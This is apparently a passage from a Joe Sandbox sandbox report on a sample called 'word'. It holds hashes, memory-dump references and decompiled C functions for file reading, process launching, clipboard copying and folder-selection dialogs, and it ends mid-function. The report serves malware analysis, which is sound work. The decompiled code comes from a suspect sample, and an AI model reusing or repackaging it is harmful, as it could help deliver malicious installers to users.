                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                      • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                      • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004061DB(void* _a4, void* _a8, long _a12) {
                                      				int _t7;
                                      				long _t11;
                                      
                                      				_t11 = _a12;
                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                      				if(_t7 == 0 || _t11 != _a12) {
                                      					return 0;
                                      				} else {
                                      					return 1;
                                      				}
                                      			}





                                      0x004061df
                                      0x004061ef
                                      0x004061f7
                                      0x00000000
                                      0x004061fe
                                      0x00000000
                                      0x00406200

                                      APIs
                                      • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061EF
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                      • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                      • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004035F8(long _a4) {
                                      				long _t2;
                                      
                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                      				return _t2;
                                      			}




                                      0x00403606
                                      0x0040360c

                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E00401FA4() {
                                      				void* _t9;
                                      				char _t13;
                                      				void* _t15;
                                      				void* _t17;
                                      				void* _t20;
                                      				void* _t22;
                                      
                                      				_t19 = E00402DA6(_t15);
                                      				E004056CA(0xffffffeb, _t7);
                                      				_t9 = E00405C4B(_t19); // executed
                                      				_t20 = _t9;
                                      				if(_t20 == _t15) {
                                      					 *((intOrPtr*)(_t22 - 4)) = 1;
                                      				} else {
                                      					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                      						_t13 = E00406AE0(_t17, _t20); // executed
                                      						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                      							if(_t13 != _t15) {
                                      								 *((intOrPtr*)(_t22 - 4)) = 1;
                                      							}
                                      						} else {
                                      							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                      						}
                                      					}
                                      					_push(_t20);
                                      					CloseHandle();
                                      				}
                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                      				return 0;
                                      			}









                                      0x00401faa
                                      0x00401faf
                                      0x00401fb5
                                      0x00401fba
                                      0x00401fbe
                                      0x0040292e
                                      0x00401fc4
                                      0x00401fc7
                                      0x00401fca
                                      0x00401fd2
                                      0x00401fe1
                                      0x00401fe3
                                      0x00401fe3
                                      0x00401fd4
                                      0x00401fd8
                                      0x00401fd8
                                      0x00401fd2
                                      0x00401fea
                                      0x00401feb
                                      0x00401feb
                                      0x00402c2d
                                      0x00402c39

                                      APIs
                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
                                        • Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                        • Part of subcall function 00405C4B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000), ref: 00405C74
                                        • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                      • CloseHandle.KERNEL32(?), ref: 00401FEB
                                        • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                        • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B13
                                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                      • String ID:
                                      • API String ID: 2972824698-0
                                      • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                      • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                      • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                      • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 95%
                                      			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                      				struct HWND__* _v8;
                                      				long _v12;
                                      				struct tagRECT _v28;
                                      				void* _v36;
                                      				signed int _v40;
                                      				int _v44;
                                      				int _v48;
                                      				signed int _v52;
                                      				int _v56;
                                      				void* _v60;
                                      				void* _v68;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				struct HWND__* _t94;
                                      				long _t95;
                                      				int _t100;
                                      				void* _t108;
                                      				intOrPtr _t130;
                                      				struct HWND__* _t134;
                                      				int _t156;
                                      				int _t159;
                                      				struct HMENU__* _t164;
                                      				struct HWND__* _t168;
                                      				struct HWND__* _t169;
                                      				int _t171;
                                      				void* _t172;
                                      				short* _t173;
                                      				short* _t175;
                                      				int _t177;
                                      
                                      				_t169 =  *0x429244;
                                      				_t156 = 0;
                                      				_v8 = _t169;
                                      				if(_a8 != 0x110) {
                                      					if(_a8 == 0x405) {
                                      						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                      					}
                                      					if(_a8 != 0x111) {
                                      						L17:
                                      						_t171 = 1;
                                      						if(_a8 != 0x404) {
                                      							L25:
                                      							if(_a8 != 0x7b) {
                                      								goto L20;
                                      							}
                                      							_t94 = _v8;
                                      							if(_a12 != _t94) {
                                      								goto L20;
                                      							}
                                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                      							_a8 = _t95;
                                      							if(_t95 <= _t156) {
                                      								L36:
                                      								return 0;
                                      							}
                                      							_t164 = CreatePopupMenu();
                                      							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                      							_t100 = _a16;
                                      							_t159 = _a16 >> 0x10;
                                      							if(_a16 == 0xffffffff) {
                                      								GetWindowRect(_v8,  &_v28);
                                      								_t100 = _v28.left;
                                      								_t159 = _v28.top;
                                      							}
                                      							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                      								_v60 = _t156;
                                      								_v48 = 0x423748;
                                      								_v44 = 0x1000;
                                      								_a4 = _a8;
                                      								do {
                                      									_a4 = _a4 - 1;
                                      									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                      								} while (_a4 != _t156);
                                      								OpenClipboard(_t156);
                                      								EmptyClipboard();
                                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                      								_a4 = _t108;
                                      								_t172 = GlobalLock(_t108);
                                      								do {
                                      									_v48 = _t172;
                                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                      									 *_t173 = 0xd;
                                      									_t175 = _t173 + 2;
                                      									 *_t175 = 0xa;
                                      									_t172 = _t175 + 2;
                                      									_t156 = _t156 + 1;
                                      								} while (_t156 < _a8);
                                      								GlobalUnlock(_a4);
                                      								SetClipboardData(0xd, _a4);
                                      								CloseClipboard();
                                      							}
                                      							goto L36;
                                      						}
                                      						if( *0x42922c == _t156) {
                                      							ShowWindow( *0x42a268, 8);
                                      							if( *0x42a2ec == _t156) {
                                      								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                      							}
                                      							E0040459D(_t171);
                                      							goto L25;
                                      						}
                                      						 *0x421f18 = 2;
                                      						E0040459D(0x78);
                                      						goto L20;
                                      					} else {
                                      						if(_a12 != 0x403) {
                                      							L20:
                                      							return E0040462B(_a8, _a12, _a16);
                                      						}
                                      						ShowWindow( *0x429230, _t156);
                                      						ShowWindow(_t169, 8);
                                      						E004045F9(_t169);
                                      						goto L17;
                                      					}
                                      				}
                                      				_v52 = _v52 | 0xffffffff;
                                      				_v40 = _v40 | 0xffffffff;
                                      				_t177 = 2;
                                      				_v60 = _t177;
                                      				_v56 = 0;
                                      				_v48 = 0;
                                      				_v44 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_t130 =  *0x42a270;
                                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                      				 *0x429230 = GetDlgItem(_a4, 0x403);
                                      				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                      				_t134 = GetDlgItem(_a4, 0x3f8);
                                      				 *0x429244 = _t134;
                                      				_v8 = _t134;
                                      				E004045F9( *0x429230);
                                      				 *0x429234 = E00404F52(4);
                                      				 *0x42924c = 0;
                                      				GetClientRect(_v8,  &_v28);
                                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                                      				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                      				if(_a8 >= 0) {
                                      					SendMessageW(_v8, 0x1001, 0, _a8);
                                      					SendMessageW(_v8, 0x1026, 0, _a8);
                                      				}
                                      				if(_a12 >= _t156) {
                                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                                      				}
                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                      				_push(0x1b);
                                      				E004045C4(_a4);
                                      				if(( *0x42a278 & 0x00000003) != 0) {
                                      					ShowWindow( *0x429230, _t156);
                                      					if(( *0x42a278 & 0x00000002) != 0) {
                                      						 *0x429230 = _t156;
                                      					} else {
                                      						ShowWindow(_v8, 8);
                                      					}
                                      					E004045F9( *0x429228);
                                      				}
                                      				_t168 = GetDlgItem(_a4, 0x3ec);
                                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                      				if(( *0x42a278 & 0x00000004) != 0) {
                                      					SendMessageW(_t168, 0x409, _t156, _a12);
                                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                                      				}
                                      				goto L36;
                                      			}

































                                      0x00405811
                                      0x00405817
                                      0x00405821
                                      0x00405824
                                      0x004059ba
                                      0x004059de
                                      0x004059de
                                      0x004059f1
                                      0x00405a0f
                                      0x00405a11
                                      0x00405a19
                                      0x00405a6f
                                      0x00405a73
                                      0x00000000
                                      0x00000000
                                      0x00405a75
                                      0x00405a7b
                                      0x00000000
                                      0x00000000
                                      0x00405a85
                                      0x00405a8d
                                      0x00405a90
                                      0x00405b92
                                      0x00000000
                                      0x00405b92
                                      0x00405a9f
                                      0x00405aaa
                                      0x00405ab3
                                      0x00405abe
                                      0x00405ac1
                                      0x00405aca
                                      0x00405ad0
                                      0x00405ad3
                                      0x00405ad3
                                      0x00405aeb
                                      0x00405af4
                                      0x00405af7
                                      0x00405afe
                                      0x00405b05
                                      0x00405b0d
                                      0x00405b0d
                                      0x00405b24
                                      0x00405b24
                                      0x00405b2b
                                      0x00405b31
                                      0x00405b3d
                                      0x00405b44
                                      0x00405b4d
                                      0x00405b4f
                                      0x00405b52
                                      0x00405b61
                                      0x00405b64
                                      0x00405b6a
                                      0x00405b6b
                                      0x00405b71
                                      0x00405b72
                                      0x00405b73
                                      0x00405b7b
                                      0x00405b86
                                      0x00405b8c
                                      0x00405b8c
                                      0x00000000
                                      0x00405aeb
                                      0x00405a21
                                      0x00405a51
                                      0x00405a59
                                      0x00405a64
                                      0x00405a64
                                      0x00405a6a
                                      0x00000000
                                      0x00405a6a
                                      0x00405a25
                                      0x00405a2f
                                      0x00000000
                                      0x004059f3
                                      0x004059f9
                                      0x00405a34
                                      0x00000000
                                      0x00405a3d
                                      0x00405a02
                                      0x00405a07
                                      0x00405a0a
                                      0x00000000
                                      0x00405a0a
                                      0x004059f1
                                      0x0040582a
                                      0x0040582e
                                      0x00405836
                                      0x0040583a
                                      0x0040583d
                                      0x00405840
                                      0x00405843
                                      0x00405846
                                      0x00405847
                                      0x00405848
                                      0x00405861
                                      0x00405864
                                      0x0040586e
                                      0x0040587d
                                      0x00405885
                                      0x0040588d
                                      0x00405892
                                      0x00405895
                                      0x004058a1
                                      0x004058aa
                                      0x004058b3
                                      0x004058d5
                                      0x004058db
                                      0x004058ec
                                      0x004058f1
                                      0x004058ff
                                      0x0040590d
                                      0x0040590d
                                      0x00405912
                                      0x00405920
                                      0x00405920
                                      0x00405925
                                      0x00405928
                                      0x0040592d
                                      0x00405939
                                      0x00405942
                                      0x0040594f
                                      0x0040595e
                                      0x00405951
                                      0x00405956
                                      0x00405956
                                      0x0040596a
                                      0x0040596a
                                      0x0040597e
                                      0x00405987
                                      0x00405990
                                      0x004059a0
                                      0x004059ac
                                      0x004059ac
                                      0x00000000

                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 00405867
                                      • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                      • GetClientRect.USER32 ref: 004058B3
                                      • GetSystemMetrics.USER32 ref: 004058BA
                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                      • ShowWindow.USER32(00000000,?), ref: 00405942
                                      • ShowWindow.USER32(?,00000008), ref: 00405956
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                      • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                        • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                      • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                      • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                      • ShowWindow.USER32(00000000), ref: 00405A02
                                      • ShowWindow.USER32(?,00000008), ref: 00405A07
                                      • ShowWindow.USER32(00000008), ref: 00405A51
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                      • CreatePopupMenu.USER32 ref: 00405A96
                                      • AppendMenuW.USER32 ref: 00405AAA
                                      • GetWindowRect.USER32(?,?), ref: 00405ACA
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                      • OpenClipboard.USER32(00000000), ref: 00405B2B
                                      • EmptyClipboard.USER32 ref: 00405B31
                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                      • GlobalLock.KERNEL32 ref: 00405B47
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                      • SetClipboardData.USER32 ref: 00405B86
                                      • CloseClipboard.USER32 ref: 00405B8C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: H7B${
                                      • API String ID: 590372296-2256286769
                                      • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                      • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                      • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                      • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				long _v16;
                                      				long _v20;
                                      				long _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				long _v36;
                                      				char _v40;
                                      				unsigned int _v44;
                                      				signed int _v48;
                                      				WCHAR* _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				WCHAR* _v72;
                                      				void _v76;
                                      				struct HWND__* _v80;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr _t82;
                                      				long _t87;
                                      				short* _t89;
                                      				void* _t95;
                                      				signed int _t96;
                                      				int _t109;
                                      				signed short _t114;
                                      				signed int _t118;
                                      				struct HWND__** _t122;
                                      				intOrPtr* _t138;
                                      				WCHAR* _t146;
                                      				unsigned int _t150;
                                      				signed int _t152;
                                      				unsigned int _t156;
                                      				signed int _t158;
                                      				signed int* _t159;
                                      				signed int* _t160;
                                      				struct HWND__* _t166;
                                      				struct HWND__* _t167;
                                      				int _t169;
                                      				unsigned int _t197;
                                      
                                      				_t156 = __edx;
                                      				_t82 =  *0x422720;
                                      				_v32 = _t82;
                                      				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                      				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                      				if(_a8 == 0x40b) {
                                      					E00405CAC(0x3fb, _t146);
                                      					E004068EF(_t146);
                                      				}
                                      				_t167 = _a4;
                                      				if(_a8 != 0x110) {
                                      					L8:
                                      					if(_a8 != 0x111) {
                                      						L20:
                                      						if(_a8 == 0x40f) {
                                      							L22:
                                      							_v8 = _v8 & 0x00000000;
                                      							_v12 = _v12 & 0x00000000;
                                      							E00405CAC(0x3fb, _t146);
                                      							if(E0040603F(_t186, _t146) == 0) {
                                      								_v8 = 1;
                                      							}
                                      							E00406668(0x421718, _t146);
                                      							_t87 = E00406A35(1);
                                      							_v16 = _t87;
                                      							if(_t87 == 0) {
                                      								L30:
                                      								E00406668(0x421718, _t146);
                                      								_t89 = E00405FE2(0x421718);
                                      								_t158 = 0;
                                      								if(_t89 != 0) {
                                      									 *_t89 = 0;
                                      								}
                                      								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                      									goto L35;
                                      								} else {
                                      									_t169 = 0x400;
                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                      									asm("cdq");
                                      									_v48 = _t109;
                                      									_v44 = _t156;
                                      									_v12 = 1;
                                      									goto L36;
                                      								}
                                      							} else {
                                      								_t159 = 0;
                                      								if(0 == 0x421718) {
                                      									goto L30;
                                      								} else {
                                      									goto L26;
                                      								}
                                      								while(1) {
                                      									L26:
                                      									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                      									if(_t114 != 0) {
                                      										break;
                                      									}
                                      									if(_t159 != 0) {
                                      										 *_t159 =  *_t159 & _t114;
                                      									}
                                      									_t160 = E00405F83(0x421718);
                                      									 *_t160 =  *_t160 & 0x00000000;
                                      									_t159 = _t160;
                                      									 *_t159 = 0x5c;
                                      									if(_t159 != 0x421718) {
                                      										continue;
                                      									} else {
                                      										goto L30;
                                      									}
                                      								}
                                      								_t150 = _v44;
                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                      								_v44 = _t150 >> 0xa;
                                      								_v12 = 1;
                                      								_t158 = 0;
                                      								__eflags = 0;
                                      								L35:
                                      								_t169 = 0x400;
                                      								L36:
                                      								_t95 = E00404F52(5);
                                      								if(_v12 != _t158) {
                                      									_t197 = _v44;
                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                      										_v8 = 2;
                                      									}
                                      								}
                                      								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                      									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                      									if(_v12 == _t158) {
                                      										SetDlgItemTextW(_a4, _t169, 0x421708);
                                      									} else {
                                      										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                      									}
                                      								}
                                      								_t96 = _v8;
                                      								 *0x42a304 = _t96;
                                      								if(_t96 == _t158) {
                                      									_v8 = E0040140B(7);
                                      								}
                                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                                      									_v8 = _t158;
                                      								}
                                      								E004045E6(0 | _v8 == _t158);
                                      								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                      									E00404A0E();
                                      								}
                                      								 *0x423738 = _t158;
                                      								goto L53;
                                      							}
                                      						}
                                      						_t186 = _a8 - 0x405;
                                      						if(_a8 != 0x405) {
                                      							goto L53;
                                      						}
                                      						goto L22;
                                      					}
                                      					_t118 = _a12 & 0x0000ffff;
                                      					if(_t118 != 0x3fb) {
                                      						L12:
                                      						if(_t118 == 0x3e9) {
                                      							_t152 = 7;
                                      							memset( &_v76, 0, _t152 << 2);
                                      							_v80 = _t167;
                                      							_v72 = 0x423748;
                                      							_v60 = E00404E0B;
                                      							_v56 = _t146;
                                      							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                      							_t122 =  &_v80;
                                      							_v64 = 0x41;
                                      							__imp__SHBrowseForFolderW(_t122);
                                      							if(_t122 == 0) {
                                      								_a8 = 0x40f;
                                      							} else {
                                      								__imp__CoTaskMemFree(_t122);
                                      								E00405F37(_t146);
                                      								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                      								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == 0x435800) {
                                      									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                      									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                      										lstrcatW(_t146, 0x428200);
                                      									}
                                      								}
                                      								 *0x423738 =  *0x423738 + 1;
                                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                      							}
                                      						}
                                      						goto L20;
                                      					}
                                      					if(_a12 >> 0x10 != 0x300) {
                                      						goto L53;
                                      					}
                                      					_a8 = 0x40f;
                                      					goto L12;
                                      				} else {
                                      					_t166 = GetDlgItem(_t167, 0x3fb);
                                      					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                      						E00405F37(_t146);
                                      					}
                                      					 *0x429238 = _t167;
                                      					SetWindowTextW(_t166, _t146);
                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                      					_push(1);
                                      					E004045C4(_t167);
                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                      					_push(0x14);
                                      					E004045C4(_t167);
                                      					E004045F9(_t166);
                                      					_t138 = E00406A35(8);
